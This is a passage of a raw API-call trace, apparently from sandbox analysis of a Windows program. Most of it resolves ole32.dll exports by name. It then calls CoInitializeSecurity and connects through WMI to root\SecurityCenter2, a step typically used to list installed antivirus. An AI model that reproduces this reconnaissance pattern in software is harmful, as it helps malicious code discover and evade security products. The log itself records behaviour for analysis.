(lpString="COADDREFSERVERPROCESS") returned 21 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0158.365] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0158.365] lstrlenA (lpString="COBUILDVERSION") returned 14 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0158.365] lstrlenA (lpString="COCANCELCALL") returned 12 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0158.365] lstrlenA (lpString="COCOPYPROXY") returned 11 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0158.365] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0158.365] lstrlenA (lpString="COCREATEGUID") returned 12 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0158.365] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0158.365] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0158.365] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0158.365] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0158.366] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0158.366] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0158.366] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0158.366] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0158.366] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0158.366] lstrlenA (lpString="COFILETIMENOW") returned 13 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0158.366] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0158.366] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0158.366] lstrlenA (lpString="COFREELIBRARY") returned 13 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0158.366] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0158.366] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0158.366] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0158.366] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0158.366] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0158.366] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0158.366] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0158.366] lstrlenA (lpString="COGETCALLERTID") returned 14 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0158.366] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0158.366] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0158.367] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0158.367] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0158.367] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0158.367] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0158.367] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0158.367] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0158.367] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0158.367] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0158.367] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0158.367] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0158.367] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0158.367] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0158.367] lstrlenA (lpString="COGETMALLOC") returned 11 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0158.367] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0158.367] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0158.367] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0158.368] lstrlenA (lpString="COGETOBJECT") returned 11 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0158.368] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0158.368] lstrlenA (lpString="COGETPSCLSID") returned 12 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0158.368] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0158.368] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0158.368] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0158.368] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0158.368] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0158.368] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0158.368] lstrlenA (lpString="COINITIALIZE") returned 12 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0158.368] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0158.368] lstrcpyA (in: lpString1=0x239e330, lpString2="CoInitializeSecurity" | out: lpString1="CoInitializeSecurity") returned="CoInitializeSecurity" [0158.368] lstrlenA (lpString="COINITIALIZESECURITY") returned 20 [0158.368] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0158.382] lstrlenA (lpString="ole32.dll") returned 9 [0158.382] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76d60000 [0158.382] lstrcpyA (in: lpString1=0x239e340, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0158.382] lstrlenA (lpString="BINDMONIKER") returned 11 [0158.382] lstrcpyA (in: lpString1=0x239e340, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0158.382] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0158.382] lstrcpyA (in: lpString1=0x239e340, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0158.382] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0158.382] lstrcpyA (in: lpString1=0x239e340, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0158.382] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0158.382] lstrcpyA (in: lpString1=0x239e340, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0158.382] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0158.382] lstrcpyA (in: lpString1=0x239e340, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0158.383] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0158.383] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0158.383] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0158.383] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0158.383] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0158.383] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0158.383] lstrlenA (lpString="COBUILDVERSION") returned 14 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0158.383] lstrlenA (lpString="COCANCELCALL") returned 12 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0158.383] lstrlenA (lpString="COCOPYPROXY") returned 11 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0158.383] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0158.383] lstrlenA (lpString="COCREATEGUID") returned 12 [0158.383] lstrcpyA (in: lpString1=0x239e340, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0158.383] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0158.383] CoCreateInstance (in: rclsid=0xf6d74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xf6d84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1b0004 | out: ppv=0x1b0004*=0x2550828) returned 0x0 [0158.416] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2550828, strNetworkResource="root\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1b0008 | out: ppNamespace=0x1b0008*=0x255cfe4) returned 0x0 [0162.472] lstrlenA (lpString="ole32.dll") returned 9 [0162.472] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76d60000 [0162.472] lstrcpyA (in: lpString1=0x239e334, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0162.472] lstrlenA (lpString="BINDMONIKER") returned 11 [0162.472] lstrcpyA (in: lpString1=0x239e334, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0162.472] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0162.472] lstrcpyA (in: lpString1=0x239e334, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0162.472] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0162.472] lstrcpyA (in: lpString1=0x239e334, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0162.472] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0162.472] lstrcpyA (in: lpString1=0x239e334, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0162.472] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0162.472] lstrcpyA (in: lpString1=0x239e334, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0162.472] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0162.472] lstrcpyA (in: lpString1=0x239e334, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0162.472] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0162.472] lstrcpyA (in: lpString1=0x239e334, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0162.472] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0162.472] lstrcpyA (in: lpString1=0x239e334, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0162.472] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0162.473] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0162.473] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0162.473] lstrlenA (lpString="COBUILDVERSION") returned 14 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0162.473] lstrlenA (lpString="COCANCELCALL") returned 12 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0162.473] lstrlenA (lpString="COCOPYPROXY") returned 11 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0162.473] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0162.473] lstrlenA (lpString="COCREATEGUID") returned 12 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0162.473] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0162.473] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0162.473] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0162.473] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0162.473] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0162.473] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0162.473] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0162.473] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0162.473] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0162.473] lstrlenA (lpString="COFILETIMENOW") returned 13 [0162.473] lstrcpyA (in: lpString1=0x239e334, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0162.474] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0162.474] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0162.474] lstrlenA (lpString="COFREELIBRARY") returned 13 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0162.474] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0162.474] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0162.474] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0162.474] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0162.474] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0162.474] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0162.474] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0162.474] lstrlenA (lpString="COGETCALLERTID") returned 14 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0162.474] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0162.474] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0162.474] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0162.474] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0162.474] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0162.474] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0162.474] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0162.474] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0162.474] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0162.475] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0162.475] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0162.475] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0162.475] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0162.475] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0162.475] lstrlenA (lpString="COGETMALLOC") returned 11 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0162.475] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0162.475] 